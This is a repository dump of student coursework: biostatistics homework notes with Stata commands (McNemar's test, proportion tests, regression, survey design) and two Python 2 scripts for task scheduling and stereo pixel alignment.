**Calculate the risk difference as the estimated proportion in the fresh blood group minus estimated proportion in the standard blood group.** #### \n\n\tcs outcome fresh\n\n\n> Estimate of risk difference: **-0.0025048**\n\n> 95% Confidence Interval: **[-0.1032915,0.0982819]**\n\n\n#### 5. Use a two-sample test of proportions to test whether there is a difference in the proportion of infants experiencing the composite outcome between fresh blood group and the standard protocol group at the alpha=0.05 level of significance. ####\n\n> Proportion (percent) \n\n\ttabulate fresh\n\n fresh | Freq. | Percent | Cum.\n----------- | ------------ | --------- | -----------\n 0 | 189 | 50.13 | 50.13\n 1 | 188 | 49.87 | 100.00\n Total | 377 | 100.00 |\n\n\n\tprtesti (fresh#proportion of fresh # Standart # proporiton of Standard) \n\tprtesti 188 0.4987 189 0.5013\n\n\n###### What is the value of the test statistic? ######\n> z = -0.0505\n\n##### What is the null distribution of the test statistic? ######\n> Standard normal distribution \n> Binomial distribution \n\n\n##### What is the p-value? ######\n> p-value is Pr(|Z| < |z|) = **0.9718**\n\n\tprtesti 99 .52659574 100 .52910053\n\n##### What is the conclusion? 
######\n> => **No evidence that the risk difference is not equal to 0** \n> Evidence that the risk difference is greater than 0 \n> Evidence that the risk difference is less than 0 \n\n" }, { "alpha_fraction": 0.6439446210861206, "alphanum_fraction": 0.6776816844940186, "avg_line_length": 53, "blob_id": "737d62b2ada435bcfb351d46f552f6a2546aa60a", "content_id": "e63e02ed7b22cdc8100911a939026046a10fc3d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5816, "license_type": "no_license", "max_line_length": 531, "num_lines": 107, "path": "/PH207x/excercises/Lesson7/McNemar Test.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# McNemar Test #\n> Paired Dichotomies \n> MI= Myocardial infarction \n> e.g. Pairs matched on age & sex:\n\nDiabetes | M.I. Yes | M.I. No | Total\n-------- | -------- | ------- | ------\nYes | 46 | 25 | 71\nNo | 98 | 119 | 217\nTotal | 144 | 144 | 288\n\n> So we have 144 pairs and we want to use McNemar's Test:\n\n | No M.I. - Diabetes | No M.I. - No Diabetes | Total\n------------------ | ------------------ | --------------------- | ------\nM.I. - Diabetes | 9 | 37 | 46\nM.I. - No Diabetes | 16 | 82 | 98\nTotal | 25 | 119 | 144\n\n## Chi-squared ##\n> Discordant entries: 37 & 16 \n> x²= SUM of all cells [ ( |obs-exp|**-1** )² / exp ] \n> **-1**: Stata ignores the correction factor, 1\n> \n> x²= ( |37-16|-1 )² / (37+16) \n> = 7.55 \n> \n> x²_(1,0.010)=6.63 \n> x²_(1,0.001)=10.83 \n> => **0.001<p<0.010** \n> \n> p < 0.05\n\n# Tutorial: Inference for Paired Data using McNemar’s Test #\n## Part 1 ##\n> Consider the following study from Dekkers et al. (2011) that compared two different screening tests for determining adrenal insufficiency. Adrenal insufficiency is a condition in which the adrenal glands do not produce adequate amounts of certain hormones. 
The screening test involves measuring a patient’s cortisol response after administration of an intravenous bolus of adrenocorticotropic hormone (ACTH). \n> \n> Currently, two doses of ACTH are used for diagnostic purposes in patients with suspected adrenal insufficiency: 1 μg and 250 μg (Dekkers et al. 2011). There is an ongoing debate about which dose should be used for the initial assessment of adrenal function (Dekkers et al. 2011). \n> \n> The goal of this study was to compare the cortisol response of the 1 μg and 250 μg ACTH test among patients with suspected adrenal insufficiency. Patients with cortisol concentrations of ≥550 nmol/l after ACTH stimulation (considered normal cortisol response) were classified as not having adrenal insufficiency. This was a retrospective cohort study whereby patients who received both the 1 μg and 250 μg ACTH test between January 2004 and December 2007 were included for analysis. The data can be found in the AI.dta dataset. \n> \n> Source: Dekkers OM, Timmermans JM, Smit JW, Romijn JA, Pereira AM. Comparison of the cortisol responses to testing with two doses of ACTH in patients with suspected adrenal insufficiency.Eur J Endocrinol 2011 Jan;164(1):83-7 \n\n | 250 μg Abnormal | 250 μg Abnormal \n------------- | --------------- | --------------- \n1 μg Abnormal | | \n1 μg Normal | | \n\n\n####1. Since this is paired data, we decide to use McNemar’s test. State the null and alternative hypothesis for McNemar’s test.####\n> **Null:** The proportion of patients classified as having adrenal insufficiency using the 1 μg test is the same as the proportion of patients classified as having adrenal insufficiency using the 250 μg test. \n> **Alternative:** Those proportions are not equal. 
\n> \n> Is this the same as testing that the proportion of patients classified as not having adrenal insufficiency using the 1 μg test is the same as the proportion of patients classified as not having adrenal insufficiency using the 250 μg test?\n\n\tuse \"AI.dta\", replace\n\ttabulate one two\n\tmcc one two\n\n> This test is based on the binomial distribution \n\n####Conclusion####\n> Since our p-value is greater than 0.05 we fail to reject the null hypothesis. Thus, we have no evidence that the proportion of patients classified as having adrenal insufficiency using the 1 μg test is different from the proportion of patients classified as having adrenal insufficiency using the 250 μg test.\n\n\n## Part II ##\n> Rather than analyzing the random sample of 500, we match those below poverty to someone above poverty in the sample of 500. \n> **mcc** - McNemar's test in Stata\n\n\tuse \"chis_matched.dta\", replace\n\n> doctor_0: above the line who goes to the doctor \n> doctor_1: below the line who goes to the doctor \n> \n> H_0: no assoc. \n> H_1: there is a association \n> \n> Dataset: \n> => poverty= 1 \n> => Age gender location\n\n\tmcc doctor_0 doctor_1\n\n> The Unexposed is interessting! \n> x² H_0~ x²_1 \n> We would use the Exact Value of McNemar, which depends on the small p-value \n> \n> Gain power by matching! \n\n\n# Summarizing the Results #\n> In this example, we have assumed that we have obtained a random sample of 500 California residents. (With observational survey data, nonresponse is always an issue, so we don’t know how random the sample actually is). \n> \n#### From the Pearson Chi-Square test, can we say that poverty causes individuals to go to the doctor less frequently over the past 12 months? (Please discuss why or why not on the discussion boards). ####\n> Yes \n> => **No**\n\n#### From the matched analysis, can we say that poverty causes individuals to go to the doctor less frequently over the past 12 months? 
(Please discuss why or why not on the discussion boards). ####\n> Yes \n> => **No**\n\n#### Could we get a better estimate of the effect of poverty on visiting the doctor in the past 12 months if we brought in more covariates/information about the individuals in the survey? (Please discuss why or why not on the discussion boards).#### \n> Not likely \n> => **Likely**\n\n# Some guidance #\nThe moral of the story is that association is not causation in observational studies, because observational studies lack treament randomization (you can't randomize people to poverty). You can bring in more individual covariate information to improve your analysis, which we will learn to do via logistic regression. \n\n" }, { "alpha_fraction": 0.2642924189567566, "alphanum_fraction": 0.3692595958709717, "avg_line_length": 26.230770111083984, "blob_id": "bb0e4a604476df57ffb0518e7e470365a1ab757e", "content_id": "038f66056f56995774974518f2a960976e79260b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1079, "license_type": "no_license", "max_line_length": 57, "num_lines": 39, "path": "/PH207x/excercises/Lesson7/Tutorial: Two-Sample Proportions.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Tutorial: Two-Sample Proportions #\n> X_1 ~ Bin(n_1, p_1) H_0: p_0=p_1 \n> X_0 ~ Bin(n_0, p_0) H_A: p_0 != p_1 \n> \n> X_1 ~ N( μ_1, σ²) H_0: μ_1=μ_2 \n> X_0 ~ N( μ_0, σ²) H_A: μ_1 != μ_2 \n \n> **T-Distribution** \n> t= ( ̅x_1 - ̅x_2) / s*p*sqrt(1/n_1 + 1/n_2) \n> \n> ^p_1= x_1/n_1 \n> ^p_0= x_0/n_0 \n> \n> Z= ^p_1 - ^p_0 / sqrt( p(1-p) * ( 1/n_1 + 1/n_2 ) )\n> p= x_1 + x_2 / n_1 + n_2\n\n\n### Test in Stata ###\n> H_0: p_1=p_0 \n> H_A: p_1 != p_0 \n> alpha=0.05 \n> 95% \n\n\ttabulate poverty doctor\n\n> | Visited doctor in the| \n> Below the federal | past 12 months | \n> poverty level | Didn't go Went to d | Total \n> -------------------+----------------------+---------- \n> Above poverty 
line | 79 358 | 437 \n> Below poverty line | 19 44 | 63 \n> -------------------+----------------------+---------- \n> Total | 98 402 | 500 \n \n> p = (358 + 44) / (437 + 63)= 0.804 \n \n> **Compare Poverty line**\n> 63*0.084= 50.7 \n> 63*(1-0.084)= 12.3 \n\n\n\n" }, { "alpha_fraction": 0.49428483843803406, "alphanum_fraction": 0.5171455144882202, "avg_line_length": 20.60839080810547, "blob_id": "dbf0aecfb7625b36a203d71cc330200340834fb1", "content_id": "9fd3c7c26522f00471e850e3299916407cf6ed49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3237, "license_type": "no_license", "max_line_length": 168, "num_lines": 143, "path": "/AI-Class/Algorithms-Python/Sched.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "\"\"\"\r\nScheduling as covered in Unit 15-3\r\n\r\n>>> tn = TaskNetwork(['S',('a',30),('b',30),('c',10),('x',60),('y',15),('z',10),'F'], {'S':['a','x'], 'a':['b'], 'b':['c'], 'c':['F'], 'x':['y'], 'y':['z'], 'z':['F']})\r\n\r\n>>> tn.next_tasks('a')\r\n['b']\r\n\r\n>>> tn.prev_tasks('a')\r\nset(['S'])\r\n\r\n>>> tn.next_tasks('F')\r\nset([])\r\n\r\n>>> tn.next_tasks('x')\r\n['y']\r\n\r\n>>> tn.prev_tasks('F')\r\nset(['c', 'z'])\r\n\r\n>>> tn.duration('x')\r\n60\r\n\r\n>>> tn.duration('c')\r\n10\r\n\r\n>>> tn.duration('z')\r\n10\r\n\r\n>>> tn.duration('b')\r\n30\r\n\r\n>>> tn.schedule()\r\n[('a', 0, 15), ('c', 60, 75), ('b', 30, 45), ('F', 85, 85), ('S', 0, 0), ('y', 60, 60), ('x', 0, 0), ('z', 75, 75)]\r\n\r\n\"\"\"\r\n\r\nclass TaskNetwork(object):\r\n\tr\"\"\"A simple task network, e.g.,\r\n\r\n a - b - c\r\n / \\\r\n start finish\r\n\t\t \\ /\r\n\t\t d - e - f\r\n\t\r\n\t durations:\r\n\t\t\t\ta = 30 min\r\n\t\t\t\tb = 30 min\r\n\t\t\t\tc = 10 min\r\n\t\t\t\td = 60 min\r\n\t\t\t\te = 15 min\r\n\t\t\t\tf = 10 min\r\n\r\n\t\t\twith functions ES and LS, earliest start time\r\n\t\t\tand latest start time, respectively, given by:\r\n\r\n\t\t\tES(start) = 
0\r\n\t\t\tES(B) = max a->b ES(A) + Duration(A)\r\n\t\t\tLS(finish) = ES(finish)\r\n\t\t\tLS(A) = min b<-a LS(B) - Duration(A)\r\n\r\n\t\t\tA schedule for the task network is defined\r\n\t\t\tas the set [ (x, ES(x), LS(x)) for all tasks x ]\r\n\t\"\"\"\r\n\tdef __init__(self,tasks,links):\r\n\t\t\"\"\"\r\n\t\t\ttasks\r\n\t\t\t\t[start, (task1, duration1), (task2, duration2), ... , (task3, duration3), finish]\r\n\t\t\tlinks\r\n\t\t\t\t{ start: [task, task, ...], task1:[task, task, ...] }\r\n\t\t\"\"\"\r\n\r\n\t\tduration_map = dict()\r\n\t\tsize = len(tasks)\r\n\t\tself.tasks = set()\r\n\t\tfor i in xrange(size):\r\n\t\t\tt = tasks[i]\r\n\t\t\tif i == 0:\r\n\t\t\t\tself.start = t\r\n\t\t\t\tself.tasks.add(t)\r\n\t\t\telif i == (size-1):\r\n\t\t\t\tself.finish = t\r\n\t\t\t\tself.tasks.add(t)\r\n\t\t\telse:\r\n\t\t\t\tlabel, duration = t\r\n\t\t\t\tassert label not in duration_map, 'duplicate task: ' + label\r\n\t\t\t\tduration_map[label] = duration\r\n\t\t\t\tself.tasks.add(label)\r\n\r\n\t\tself.duration_map = duration_map\r\n\r\n\t\tself.links = links\r\n\r\n\tdef __repr__(self):\r\n\t\treturn ''.join(['< ',self.__class__.__name__,' links=',repr(self.links),', duration_map=',repr(self.duration_map),', tasks=',repr(self.tasks),' >'])\r\n\r\n\tdef duration(self, a):\r\n\t\t\"\"\"the duration of task a\"\"\"\r\n\t\tif a == self.start or a == self.finish:\r\n\t\t\treturn 0\r\n\t\treturn self.duration_map[a]\r\n\r\n\tdef next_tasks(self, a):\r\n\t\t\"\"\"the tasks that immediately follow a\"\"\"\r\n\t\tif a in self.links:\r\n\t\t\treturn self.links[a]\r\n\t\treturn set()\r\n\r\n\tdef prev_tasks(self, a):\r\n\t\t\"\"\"the tasks that immediately precede a\"\"\"\r\n\t\tresult = set()\r\n\t\tfor t in self.tasks:\r\n\t\t\tif t != a and a in self.next_tasks(t):\r\n\t\t\t\tresult.add(t)\r\n\t\treturn result\r\n\r\n\tdef es(self, b):\r\n\t\t\"\"\"The earliest start time for task b\"\"\"\r\n\t\tif b == self.start:\r\n\t\t\treturn 0\r\n\r\n\t\treturn max([ (self.es(a) + 
self.duration(a)) \r\n\t\t\tfor a in self.prev_tasks(b) ])\r\n\r\n\tdef ls(self, a):\r\n\t\t\"\"\"The latest start time for task a\"\"\"\r\n\t\tif a == self.finish:\r\n\t\t\treturn self.es(a)\r\n\r\n\t\treturn min([ (self.ls(b)-self.duration(a)) \r\n\t\t\tfor b in self.next_tasks(a) ])\r\n\r\n\tdef schedule(self):\r\n\t\t\"\"\"A schedule for this task network\"\"\"\r\n\t\tsched = []\r\n\t\tfor t in self.tasks:\r\n\t\t\tsched.append( (t, self.es(t), self.ls(t) ) )\r\n\t\treturn sched\r\n\r\nif __name__ == '__main__':\r\n\timport doctest\r\n\tdoctest.testmod()\r\n\r\n\r\n" }, { "alpha_fraction": 0.7290186882019043, "alphanum_fraction": 0.7458563446998596, "avg_line_length": 50.32432556152344, "blob_id": "4e5ee9284c7a263eff387e7d8238de6fc2114ba1", "content_id": "8ce7c7deb1f67d73f36b39a6d79ef33a472ae7a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3801, "license_type": "no_license", "max_line_length": 605, "num_lines": 74, "path": "/PH207x/homework/ten/Simple Linear Regression.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Simple Linear Regression #\n We use data from the Environmental Protection Agency (EPA) to track the BP oil spill in Louisiana between May and September 2010. The oil well exploded on April 20, 2010, was capped in July and was declared dead in September 2010. The oil spill killed wildlife in the Gulf of Mexico and posed a significant public health risk to clean-up workers and residents of the Gulf Coast (Solomon and Janssen 2010). The EPA monitored air quality and took samples of sediment to measure the impact of the oil spill. For more information from the EPA, visit http://www.epa.gov/bpspill/sediment.html#understanding. \n \nUse the dataset oilspill.dta to answer the following questions. \n \nSimple Linear Regression. 
In this example, we track changes in the amount of nickel found in sediment along the Louisiana coast between May and September 2010 (note that there is no data from July). Nickel is a metal that is found in sediment contaminated with oil. We model the amount of nickel as a function of time (month) using linear regression. \n \nFit a linear regression model with nickel as the outcome and month as the explanatory variable. Using indicator variables, model month as a categorical covariate (i.e. for the variable \"month\", it is coded numerically as May = 5, June = 6, August = 8, September = 9). Call this Model 1. \n \nAssume the assumptions of linear regression are met for this model. You can make histograms of nickel by month to visually verify that the data does not appear to be skewed or any other evidence that would suggest a violation of the assumptions necessary to analyze this data using linear regression. \n \n**TODO:**\n* Fit a linear regression model with nickel as the outcome and month as the explanatory variable. \n* model month as a categorical covariate\n\n```stata\n\thistogram nickel, by(month)\n\txi: regress nickel i.month\n\n\tpredict r, residuals\n\tqnorm r\n\tswilk r\n\testat hettest\n```\n\n##### 1. Does the amount of nickel in the soil tend to increase over the four month period? #####\n* Yes\n* No\n\n##### 2. Examine the regression coefficients. Compare how the average nickel amount changes by month. Is it reasonable to assume that average amount of nickel increases linearly by month? #####\n* Yes\n* No\n\n##### 3. Make a residual plot. #####\n\n1. Is there any evidence of outliers? \n\t* Yes\n\t* No\n\n2. Is there any evidence of heteroscedasticity?\n\t* Yes\n\t* No\n\n##### 4. Using Model 2, it is estimated that, on average, nickel increases by ______ each month, from May to September.. #####\nNow, assume the amount of nickel increases linearly by month, and the assumptions of linear regression continue to hold. 
Fit a model with nickel as the outcome and month modeled as a continuous explanatory variable. Call this Model 2. \n> **Hint1:** Read the interpretation of q4 given in Tutorial: Simple Linear Regression pdf . the ans is in the sme table \n\n```stata\n\thistogram nickel, by(month)\n\txi: regress nickel i.month\n\tregress nickel month\n```\n\n\n##### 5. What is the 95% confidence interval for the average increase in nickel each month? #####\nLower Bound \nUpper Bound \n\n##### 6. Given that the relationship between month and nickel appears to be linear, is it reasonable to use Model 2 to predict the amount of nickel in the soil in July 2010? #####\n* Yes\n* No\n\n##### 7. Given that the relationship between month and nickel appears to be linear, is it reasonable to use Model 2 to predict the amount of nickel in the soil in October 2010? #####\n* Yes\n* No\n\n##### 8. What is the average amount of nickel in the soil during August 2010? #####\n\n1. According to model 1 (Hint: Think about how dummy/indicator variables are coded.)\n2. According to model 2\n\n##### 9. True or False: Model 1 makes stronger modeling assumptions than Model 2. #####\n* Yes\n* No\n\n\n\n" }, { "alpha_fraction": 0.7713620066642761, "alphanum_fraction": 0.7819782495498657, "avg_line_length": 71.86792755126953, "blob_id": "62379e4b2ce60944b97ff3da1781e0b55920ed87", "content_id": "60b768e6a19a72f77d7a5fdc9d29398df1a329ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3866, "license_type": "no_license", "max_line_length": 594, "num_lines": 53, "path": "/PH207x/homework/eight/Other Aspects of Survey Design.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Other Aspects of Survey Design #\n> Thus far, we have examined sampling design, which is only one element of designing a survey. 
Building and testing the survey instrument/questionnaire, anticipating and preparing for non-response, and training field teams to conduct the survey are several other critical aspects that we have not even touched on! \n> \n> Use the Boston physical health survey example from the previous question to answer the following: \n\n### 1. When designing your survey, you are trying to decide whether to use a 2-page questionnaire with 15 simple questions about whether an individual exercises, how many times per week, and whether they have a history of diabetes, along with some other very basic demographics (call this Survey 1). Your colleague says you could get much better information if you used a 10 page questionnaire with a more complete medical history and history of exercise and physical activity (call this Survey 2).###\n> Krosnick (1991) discusses “satisficing” (satisfy + suffice) in surveys. To paraphrase this discussion, satisficing occurs when, rather than optimizing their responses to best reflect reality, survey respondents try to reduce the cognitive burden associated with the survey and consequently may select a survey response haphazardly or even arbitrarily.\n\n\n> **Survey 1**\n* 15 simple questions about whether an individual exercises, \n* how many times per week\n* whether they have a history of diabetes, along with some other very basic demographics\n\n> **Survey 2**\n* 10 page questionnaire with a more complete medical history \n* history of exercise \n* physical activity\n\n\n\n#### Which survey would be more susceptible to satisficing? ####\n\n* Survey 1 \n* Survey 2 \n\n> *Source: Krosnick, J. (1991). Response Strategies for Coping with the Cognitive Demands of Attitude Measures in Surveys. Applied Cognitive Psychology, 5: 236.*\n\n\n\n### 2.You decide to implement a door-to-door survey, where you randomly sample addresses within a neighborhood and train a field team to ask the survey questions at the selected households. 
(You have a complete listing of addresses in Boston). ### \n> Your colleague says you should obtain a listing of all land-line telephone numbers in Boston (a listing of cell phone numbers is not available) and randomly sample numbers from this list and ask the questions over the phone. For sake of argument, assume that you get a 100% response rate for both modes (door to door and phone calls), and that you construct survey weights using the table above. \n\n#### Would you expect the door-to-door or land-line method to produce unbiased results? (Think about which sampling frame is likely to be more complete.) ####\n\n* door-to-door \n* landline \n\n\n#### Would you expect the door-to-door or land-line method to be cheaper to implement? ####\n\n* door-to-door\n* landline \n\n> *Note: web-based surveys are also common. In order to minimize non-response, some surveys use multiple modes of response and follow-up (e.g. web + phone; or web + household follow-up).*\n\n\n### 3. Individuals can opt out of any part of your survey. High BMI and low physical activity are risk factors for diabetes, and you find that individuals with these characteristics are less likely to answer questions about history of diabetes (note that high BMI and low physical activity are risk factors for diabetes). In a complete case analysis, missing data is dropped, survey weights are recalculated, and data is analyzed assuming missing observations were never collected. In a complete case analysis, would you expect to obtain unbiased estimates of diabetes prevalence in Boston? ###\n\n* No \n* Yes\n\n> *Source: Boston Redevelopment Authority Research Division (2011). 
Boston 2010 Census Population: Planning District Comparison: http://www.bostonredevelopmentauthority.org/PDF/ResearchPublications//PDPercentChange.pdf*\n" }, { "alpha_fraction": 0.771484375, "alphanum_fraction": 0.771484375, "avg_line_length": 83.83333587646484, "blob_id": "cd7bbafad31bbc5178a16e30a2fb28c915c144b3", "content_id": "370d2443c6f5920f5a87ce9a580ae32bb52f5a85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 512, "license_type": "no_license", "max_line_length": 253, "num_lines": 6, "path": "/PH207x/homework/nine/Confounding Multiple Choice.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Confounding Multiple Choice ##\n> Select the best answer: In the presence of confounding,\n* The crude (unadjusted) results are not correct if the sample size is small. \n* The exposed and unexposed are exchangeable. \n* => **The results are not correct because there is a third factor associated with exposure and outcome that at least partially explains the results. (In other words: the results obtained directly are not correct, that's why they need to be adjusted )**\n* Stratification is not appropriate. 
\n\n\n" }, { "alpha_fraction": 0.520205557346344, "alphanum_fraction": 0.5466012358665466, "avg_line_length": 23.470237731933594, "blob_id": "049e43997f6105b2ffe3442c89d4174087007ba3", "content_id": "0885ed1ccc56ea59666ae256e2c7ad859e842828", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4281, "license_type": "no_license", "max_line_length": 305, "num_lines": 168, "path": "/AI-Class/Algorithms-Python/PixelAlignment.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "\"\"\"Attempt to implement pixel correspondence from scan lines\r\nas described in Unit 17-26.\r\n\"\"\"\r\n\r\n# Convenience constants for making examples\r\nblack = 'B'\r\nblue = 'U'\r\nred = 'R'\r\nb = black\r\nr = red\r\n\r\ndef align(left, right, \\\r\n\t\tbad_match_cost, occlusion_cost, good_match_cost=0):\r\n\t\"\"\" Print the pixel correspondence \r\n\t\tbetween left and right camera scan lines\r\n\t\t(that is, align the scan lines)\r\n\r\n\tQuiz from Unit 17-16 (note: there are multiple correct answers for \r\n\tthis as explained in the aiqus forums):\r\n\t>>> left = [b,b,r,r,r,b]\r\n\t>>> right = [b,r,r,r,r,b]\r\n\t>>> a = align(left, right, 20, 5)\r\n\t>>> print_align(a)\r\n\t1 2 3 4 5 6 \r\n\tB B R R R B \r\n\t| / / / | \r\n\tB R R R R B \r\n\tcost=10\r\n\r\n\tUnit 17-17 (this works):\r\n\t>>> left = [b,r,b,b,b,b]\r\n\t>>> right = [b,b,b,b,r,b]\r\n\t>>> a = align(left, right, bad_match_cost=20, occlusion_cost=10)\r\n\t>>> print_align(a)\r\n\t1 2 3 4 5 6 \r\n\tB R B B B B \r\n\t| / / / | \r\n\tB B B B R B \r\n\tcost=20\r\n\r\n\tOther examples (just made up):\r\n\t>>> left = [b,b,b,b,b,r,r]\r\n\t>>> right = [r,r,b,b,b,b,r]\r\n\t>>> a = align(left, right, 20, 10)\r\n\t>>> a\r\n\t((40, [('bad_match', (0, 0), 20), ('right_occl', (0, 1), 30), ('good_match', (1, 2), 30), ('good_match', (2, 3), 30), ('good_match', (3, 4), 30), ('good_match', (4, 5), 30), ('good_match', (5, 6), 30), ('left_occl', (6, 6), 
40)]), ['B', 'B', 'B', 'B', 'B', 'R', 'R'], ['R', 'R', 'B', 'B', 'B', 'B', 'R'])\r\n\t>>> print_align(a)\r\n\t1 2 3 4 5 6 7 \r\n\tB B B B B R R \r\n\t| \\ \\ \\ \\ \\ \r\n\tR R B B B B R \r\n\tcost=40\r\n\r\n\t>>> left = [b,b,blue,r,r,r,b,b]\r\n\t>>> right = [b,b,r,r,r,blue,b,b]\r\n\t>>> a = align(left, right, 20, 10)\r\n\t>>> print_align(a)\r\n\t1 2 3 4 5 6 7 8 \r\n\tB B U R R R B B \r\n\t| | / / / | | \r\n\tB B R R R U B B \r\n\tcost=20\r\n\t\"\"\"\r\n\tdef match(i, j):\r\n\t\tif left[i] == right[j]:\r\n\t\t\treturn good_match_cost, 'good_match'\r\n\t\treturn bad_match_cost, 'bad_match'\r\n\r\n\tdef ismatch(action):\r\n\t\treturn action == 'good_match' or action == 'bad_match'\r\n\r\n\tdef best_tuple(value_path_action_tuples):\r\n\t\tbest_tuple = None\r\n\t\tfor t in value_path_action_tuples:\r\n\t\t\tval, path, action = t\r\n\t\t\tif best_tuple is None:\r\n\t\t\t\tbest_tuple = t\r\n\t\t\telse:\r\n\t\t\t\tbest_val, best_path, best_action = best_tuple\r\n\t\t\t\tif val < best_val:\r\n\t\t\t\t\tbest_tuple = t\r\n\t\t\t\telif val == best_val:\r\n\t\t\t\t\tpath_action, path_coords, path_val = path[0]\r\n\t\t\t\t\tif ismatch(path_action):\r\n\t\t\t\t\t\tbest_tuple = t\r\n\t\treturn best_tuple\r\n\r\n\tcache = dict()\r\n\r\n\tdef value(i, j):\r\n\t\tif (i, j) in cache:\r\n\t\t\treturn cache[(i, j)]\r\n\r\n\t\ttuples = []\r\n\t\tif i >= 0 and j >= 0:\r\n\t\t\tmatch_val, match_path = value(i-1, j-1)\r\n\t\t\tmatch_cost = match(i, j)\r\n\t\t\tmatch_val += match_cost[0]\r\n\t\t\ttuples.append( (match_val, match_path, match_cost[1]) )\r\n\t\tif i >= 0:\r\n\t\t\thoriz_occl_val, horiz_occl_path = value(i-1, j)\r\n\t\t\thoriz_occl_val += occlusion_cost\r\n\t\t\ttuples.append( (horiz_occl_val, horiz_occl_path,'left_occl') )\r\n\t\tif j >= 0:\r\n\t\t\tvert_occl_val, vert_occl_path = value(i, j-1)\r\n\t\t\tvert_occl_val += occlusion_cost\r\n\t\t\ttuples.append( (vert_occl_val, vert_occl_path, 'right_occl') )\r\n\r\n\t\tif tuples:\r\n\t\t\tbest_val, best_path, best_action = 
best_tuple(tuples)\r\n\t\t\tmy_path = list(best_path)\r\n\r\n\t\t\t# mlake sure to append our best to the existing path\r\n\t\t\tmy_path.append( (best_action, (i, j), best_val) )\r\n\t\t\tresult = best_val, my_path\r\n\t\telse:\r\n\t\t\tresult = 0, []\r\n\r\n\t\tcache[(i, j)] = result\r\n\t\treturn result\r\n\r\n\tn = len(left)-1\r\n\r\n\treturn value(n, n), left, right\r\n\r\ndef print_align(alignment):\r\n\t\"\"\"\r\n\tPretty-prints the results of the align() function.\r\n\r\n\tEx.\r\n\tB B U R R R B B\r\n | | / / / | |\r\n\tB B R R R U B B\r\n\t\"\"\"\r\n\tcost, path = alignment[0]\r\n\tleft, right = alignment[1:]\r\n\tn = len(left)\r\n\r\n\tresult = []\r\n\tfor i in xrange(n):\r\n\t\tresult.append( '%d ' % (i+1) )\r\n\tresult.append('\\n')\r\n\tfor p in left:\r\n\t\tresult.append( '%s ' % p )\r\n\tresult.append('\\n')\r\n\tfor action, coord, cost in path:\r\n\t\tif action == 'right_occl' or action == 'left_occl':\r\n\t\t\tresult.append( ' ' )\r\n\t\telif action == 'good_match' or action == 'bad_match':\r\n\t\t\ti, j = coord\r\n\t\t\tif i == j:\r\n\t\t\t\tresult.append('| ')\r\n\t\t\telif i > j:\r\n\t\t\t\tresult.append('/ ')\r\n\t\t\telse:\r\n\t\t\t\tresult.append('\\\\ ')\r\n\tresult.append('\\n')\r\n\r\n\tfor p in right:\r\n\t\tresult.append( '%s ' % p )\r\n\tresult.append('\\n')\r\n\tresult.append('cost=%d' % cost)\r\n\t\r\n\tprint ''.join(result)\r\n\r\nif __name__ == '__main__':\r\n\timport doctest\r\n\tdoctest.testmod()\r\n\r\n" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.6657754182815552, "avg_line_length": 35.978023529052734, "blob_id": "1ebd110c4f4b2889171bf93fc1a9e372ed921cf3", "content_id": "f2807c123f7525df11aa7d475b326b7c1209184b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3436, "license_type": "no_license", "max_line_length": 291, "num_lines": 91, "path": "/PH207x/homework/six/Hypothesis Testing with known Variance.md", "repo_name": 
"erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "#Hypothesis Testing with known Variance#\nNow, let's switch gears and assume that we didn't know the true population mean μ, and we only observed a sample of 25 school children in Delhi. Let's use the sample mean from this set of children to make inference about the true population mean μ.\n\nFor this question, assume that σ=12.5 is known and that the sample size of 25 is large enough to use the Central Limit Theorem. So, for this question, we will base our inferences off of the normal distribution, not the t-distribution).\n\nIn this scenario, we can conduct a one-sample Z-test for inference about μ in a population with known variance σ2. To test H0:μ=μ0, we can use the test statistic: Z^∗= (xˉ−μ_0) / (σ/sqrt(n) )\n\nUnder the null hypothesis, Z∗∼N(0,1). So, we can use the standard normal distribution to calculate a p-value for this hypothesis test:\n\n* For the one-sided test with alternative hypothesis Ha:μ>μ0, we can calculate a p-value using the formula p=P(Z>Z∗).\n* For the one-sided test with alternative hypothesis Ha:μ≤μ0, we can calculate a p-value using the formula p=P(Z≤Z∗).\n* For the two-sided test with alternative hypothesis Ha:μ≠μ0, we can calculate a p-value using the formula p=2∗P(Z≤−|Z∗|).\n\nNote: there is no command for directly conducting this one-sample Z-test in Stata. However, you can use the normal function in Stata to calculate the p-values. \n\n> μ= population mean= ? \n> n= sample size= 25 \n> σ= 12.5\n> p-value= ?\n\n\n> We can use the Central Limit Theorem \n> We will use the *normal distribution*\n> Use one-sample Z-test with known variance\n\n1. In a sample of size 25, what is the value of the test statistic testing whether the mean hemoglobin level is equal to 108 g/L versus the alternative that it is not equal to 108 g/L, when xˉ=103. Use a one-sample Z-test. 
